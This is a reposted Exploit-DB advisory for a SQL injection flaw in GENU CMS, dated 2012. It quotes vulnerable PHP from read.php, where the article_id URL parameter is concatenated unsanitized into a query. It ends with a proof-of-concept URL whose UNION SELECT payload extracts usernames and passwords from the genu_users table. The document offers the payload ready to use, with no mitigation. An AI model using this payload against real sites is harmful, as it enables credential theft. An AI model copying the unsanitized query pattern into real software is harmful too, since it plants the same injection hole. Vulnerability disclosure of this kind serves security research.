GENU CMS – SQL Injection - 体验盒子

作者： hordcode security

日期： 2012-04-05

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/18708/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GENU CMS SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

bug found by h0rd h0rd[at]null.net
homepage http://h0rd.net
download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
vulnerability in read.php
vuln code:
[...]
include('./../includes/common.php');

page_header($lang['ARTICLES_READ_TITLE']);

if (isset($_GET['article_id']))
{
$sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
 FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
 WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
 AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
$table_articles = $sql->fetch();
[...]

PoC exploit:
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--